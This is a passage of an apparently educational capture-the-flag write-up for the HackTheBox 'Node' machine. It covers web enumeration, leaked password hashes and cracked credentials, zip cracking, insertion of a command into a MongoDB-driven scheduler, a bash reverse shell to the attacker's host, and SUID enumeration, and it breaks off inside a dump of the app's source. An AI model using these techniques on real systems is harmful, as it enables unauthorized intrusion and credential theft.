
Hackthebox - Node

Enumeration

nmap -sC -sV 10.10.10.58 -oN node_scan
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
|   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open  hadoop-datanode Apache Hadoop
| hadoop-datanode-info: 
|_  Logs: /login
| hadoop-tasktracker-info: 
|_  Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
nmap -A -p- -sC -sV 10.10.10.58 -oN node_scan_2
  • Automated directory search tools such as DirBuster or gobuster cannot be used here: the application has a filter that blocks them
gobuster dir -u http://10.10.10.58:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -n
  • Fetching the page with curl shows the request headers and the full response
curl -vvv 10.10.10.58:3000
*   Trying 10.10.10.58:3000...
* Connected to 10.10.10.58 (10.10.10.58) port 3000 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.58:3000
> User-Agent: curl/7.81.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< X-Powered-By: Express
< Accept-Ranges: bytes
< Cache-Control: public, max-age=0
< Last-Modified: Sat, 02 Sep 2017 11:27:58 GMT
< ETag: W/"f15-15e4258ef70"
< Content-Type: text/html; charset=UTF-8
< Content-Length: 3861
< Date: Fri, 11 Mar 2022 04:14:30 GMT
< Connection: keep-alive
< 
<!doctype html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en" ng-csp="" ng-app="myplace"> <!--<![endif]-->

        <head>

                <base href="/">
                <meta charset="utf-8">
                <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

                <title>MyPlace</title>

                <!-- Bootstrap Core CSS -->
                <link href="/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">

                <!-- Theme CSS -->
                <link href="/assets/css/freelancer.min.css" rel="stylesheet">
                <link href="/assets/css/app.css" rel="stylesheet">

                <!-- Custom Fonts -->
                <link href="/vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
    <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
    <link href="https://fonts.googleapis.com/css?family=Lato:400,700,400italic,700italic" rel="stylesheet" type="text/css">
        </head>

        <body id="page-top" class="index">

    <!-- Navigation -->
    <nav id="mainNav" class="navbar navbar-default navbar-fixed-top navbar-custom">
        <div class="container">
            <!-- Brand and toggle get grouped for better mobile display -->
            <div class="navbar-header page-scroll">
                <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
                    <span class="sr-only">Toggle navigation</span> Menu <i class="fa fa-bars"></i>
                </button>
                <a class="navbar-brand" href="/">MyPlace</a>
            </div>

            <!-- Collect the nav links, forms, and other content for toggling -->
            <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
                <ul class="nav navbar-nav navbar-right">
                    <li class="hidden">
                        <a href="/"></a>
                    </li>
                    <li class="page-scroll">
                        <a href="/login">Login</a>
                    </li>
                </ul>
            </div>
            <!-- /.navbar-collapse -->
        </div>
        <!-- /.container-fluid -->
    </nav>

    <!-- Header -->
    <header>
        <div class="container">
            <div class="row">
                <div class="col-lg-12">
                    <img class="img-responsive" src="img/profile.png" alt="">
                    <div class="intro-text">
                        <span class="name">Welcome to MyPlace</span>
                    </div>
                </div>
            </div>
        </div>
    </header>

                <!--[if lt IE 8]>
                    <p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
                <![endif]-->

                <div data-ng-view=""></div>

        </body>

        <script type="text/javascript" src="vendor/jquery/jquery.min.js"></script>
        <script type="text/javascript" src="vendor/bootstrap/js/bootstrap.min.js"></script>
        <script type="text/javascript" src="vendor/angular/angular.min.js"></script>
        <script type="text/javascript" src="vendor/angular/angular-route.min.js"></script>
        <script type="text/javascript" src="assets/js/app/app.js"></script>
        <script type="text/javascript" src="assets/js/app/controllers/home.js"></script>
        <script type="text/javascript" src="assets/js/app/controllers/login.js"></script>
        <script type="text/javascript" src="assets/js/app/controllers/admin.js"></script>
        <script type="text/javascript" src="assets/js/app/controllers/profile.js"></script>
        <script type="text/javascript" src="assets/js/misc/freelancer.min.js"></script>
</html>
* Connection #0 to host 10.10.10.58 left intact
  • We can set the User-Agent header ourselves to see what the filter does
curl -H "User-Agent: Dirbuster" 10.10.10.58:3000
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____.  -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP"       <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` ..  "??$Qa "WQQQWTVP'    "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"`  -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa   .QP4QQQQfWkl jQQQ
QE ]QkQk $D?`  waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQDQf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/  "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@  "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ,  ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^  ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw  a,    ?QWWQQQw _.  "????9VWaamQWV???"  a j/  ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa     ???4F jQQQQQwc <aaas _aaaaa 4QW ]E  )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa,     ???9WWWh dQWWW,=QWWU?  ?!     )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6,  QWQWQQQk <c                             jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,.,                . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,,    --~-- ---  . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,.  -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ


<!-- 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 -->#

Exploitation

  • Inspecting the website, we found a couple of interesting paths:
    • assets/js/app/app.js
    • assets/js/app/controllers/home.js
    • assets/js/app/controllers/login.js
    • assets/js/app/controllers/admin.js
    • assets/js/app/controllers/profile.js
    • assets/js/misc/freelancer.min.js
  • Let's check /api/admin/backup, found in admin.js
    • Nothing really interesting here
  • /api/users/
[
  {
    "_id": "59a7365b98aa325cc03ee51c",
    "username": "myP14ceAdm1nAcc0uNT",
    "password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
    "is_admin": true
  },
  {
    "_id": "59a7368398aa325cc03ee51d",
    "username": "tom",
    "password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
    "is_admin": false
  },
  {
    "_id": "59a7368e98aa325cc03ee51e",
    "username": "mark",
    "password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
    "is_admin": false
  },
  {
    "_id": "59aa9781cced6f1d1490fce9",
    "username": "rastating",
    "password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
    "is_admin": false
  }
]

dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af # manchester

de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73 # snowflake

5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0 # Not found

Logged in with myP14ceAdm1nAcc0uNT | manchester

  • Download the backup file
  • It looks like base64

file myplace.backup

	-> myplace.backup: ASCII text, with very long lines (65536), with no line terminators
  • Decode the base64 file
cat myplace.backup | base64 -d > myplace
file myplace
	-> myplace: Zip archive data, at least v1.0 to extract, compression method=store
unzip myplace # requires password
fcrackzip -uDp /usr/share/wordlists/rockyou.txt ./myplace
	[-u] use unzip to weed out wrong passwords
	[-D] use a dictionary
	[-p] use string as initial password/file

PASSWORD FOUND!!!!: pw == magicword
  • Opening app.js we can find some credentials
  • mark | 5AYRft73VtFpc84k
ssh mark@10.10.10.58

  • The user flag is in tom's home directory, so we need to escalate from mark to tom
ps aux # see the running processes

  • There is an interesting path /var/scheduler/app.js
nano /var/scheduler/app.js
const exec        = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
  }

  setInterval(function () {
    db.collection('tasks').find().toArray(function (error, docs) {
      if (!error && docs) {
        docs.forEach(function (doc) {
          if (doc) {
            console.log('Executing task ' + doc._id + '...');
            exec(doc.cmd);
            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
          }
        });
      }
      else if (error) {
        console.log('Something went wrong: ' + error);
      }
    });
  }, 30000);

});
  • MongoDB stores its data as documents grouped into collections.
  • The scheduler reads every document in the tasks collection and passes doc.cmd straight to exec(), so if we connect to the scheduler database and insert a document with the command we want, it will be executed on the next 30-second tick
  • mark : 5AYRft73VtFpc84k
  • Connecting to the scheduler database. Ref → https://docs.mongodb.com/v4.4/mongo/
mongo --username mark --password 5AYRft73VtFpc84k scheduler

> show collections
tasks
  • SSH with another terminal and place a reverse shell in /tmp
ssh mark@10.10.10.58

cd /tmp
nano shell.sh 

---
bash -i >& /dev/tcp/10.10.14.18/8080 0>&1
---

nc -lvnp 8080
db.tasks.find()

db.tasks.insertOne({cmd: "bash /tmp/shell.sh"});
	---
	{
		"acknowledged" : true,
		"insertedId" : ObjectId("622bbe2b5804df2507a28893")
	}
	---

db.tasks.find() # Check if the task is still there if not we already got a shell

Interactive Shell

which python

python -c 'import pty;pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo
fg
[enter]
export TERM=screen

cat /tom/user.txt
	-> e1156acc3574e04b06908ecf76be91b1

Privilege Escalation

  • Looking at the SUID binaries and at the myplace app.js, the backup_key and the call to /usr/local/bin/backup in app.js are what will help to escalate privileges

find / -perm -u=s 2>/dev/null

	/usr/lib/eject/dmcrypt-get-device
	/usr/lib/snapd/snap-confine
	/usr/lib/dbus-1.0/dbus-daemon-launch-helper
	/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
	/usr/lib/openssh/ssh-keysign
	/usr/lib/policykit-1/polkit-agent-helper-1
	/usr/local/bin/backup
	/usr/bin/chfn
	/usr/bin/at
	/usr/bin/gpasswd
	/usr/bin/newgidmap
	/usr/bin/chsh
	/usr/bin/sudo
	/usr/bin/pkexec
	/usr/bin/newgrp
	/usr/bin/passwd
	/usr/bin/newuidmap
	/bin/ping
	/bin/umount
	/bin/fusermount
	/bin/ping6
	/bin/ntfs-3g
	/bin/su
	/bin/mount
cd /usr/local/bin
app.js
---
const express     = require('express');
const session     = require('express-session');
const bodyParser  = require('body-parser');
const crypto      = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const path        = require("path");
const spawn        = require('child_process').spawn;
const app         = express();
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key  = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';

MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
  }

  app.use(session({
    secret: 'the boundless tendency initiates the law.',
    cookie: { maxAge: 3600000 },
    resave: false,
    saveUninitialized: false
  }));

  app.use(function (req, res, next) {
    var agent = req.headers['user-agent'];
    var blacklist = /(DirBuster)|(Postman)|(Mozilla\/4\.0.+Windows NT 5\.1)|(Go\-http\-client)/i;

    if (!blacklist.test(agent)) {
      next();
    }
    else {
      count = Math.floor((Math.random() * 10000) + 1);
      randomString = '';

      var charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
      for (var i = 0; i < count; i++)
        randomString += charset.charAt(Math.floor(Math.random() * charset.length));

      res.set('Content-Type', 'text/plain').status(200).send(
        [
          'QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ',
          'QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ',
          'QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ',
          'QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ',
          'QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____.  -~""??9VWQQQQQQQQQQQQQQQQQQQ',
          'QQQQQQQQQQQQQP\'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ',
          'QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ',
          'QQQQQQQQQQW\' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ',
          'QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ',
          'QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ',
          'QQQQQQQP\'.yQQQQQQQQQQQP"       <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ',
          'QQQQQP\'_a.<aamQQQW!<yF "!` ..  "??$Qa "WQQQWTVP\'    "??\' =QQmWWV?46/ ?QQQQQ',
          'QQQP\'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ',
          'QQ[ j@mQP\'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"`  -?QzQ7L ]QQQ',
          'QW jQkQ@ jWQQD\'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa   .QP4QQQQfWkl jQQQ',
          'QE ]QkQk $D?`  waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ',
          'QQ,-Qm4Q/-QmQ6 "WWQma/  "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@  "QW@?$:.yQQQQ',
          'QQm/-4wTQgQWQQ,  ?4WWk 4waac -???$waQQQQQQQQF??\'<mWWWWWQW?^  ` ]6QQ\' yQQQQQ',
          'QQQQw,-?QmWQQQQw  a,    ?QWWQQQw _.  "????9VWaamQWV???"  a j/  ]QQf jQQQQQQ',
          'QQQQQQw,"4QQQQQQm,-$Qa     ???4F jQQQQQwc <aaas _aaaaa 4QW ]E  )WQ`=QQQQQQQ',
          'QQQQQQWQ/ $QQQQQQQa ?H ]Wwa,     ???9WWWh dQWWW,=QWWU?  ?!     )WQ ]QQQQQQQ',
          'QQQQQQQQQc-QWQQQQQW6,  QWQWQQQk <c                             jWQ ]QQQQQQQ',
          'QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ\'.mQQQmaa,.,                . .; QWQ.]QQQQQQQ',
          'QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ',
          'QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ',
          'QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,,    --~-- ---  . _ssawmQQQQQQk 3QQQQWQ',
          'QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ',
          'QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ',
          'QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ',
          'QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW',
          'QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,.  -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ',
          'QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ',
          'QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ',
          'QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ',
          '',
          '',
          '<!-- ' + randomString + ' -->'
        ].join("\n")
      );
    }
  });

  app.use(express.static(path.join(__dirname, 'static')));
  app.use(bodyParser.json());
  app.use(function(err, req, res, next) {
    if (err) {
      res.status(err.status || 500);
      res.send({
        message:"Uh oh, something went wrong!",
        error: true
      });
    }
    else {
      next();
    }
  });
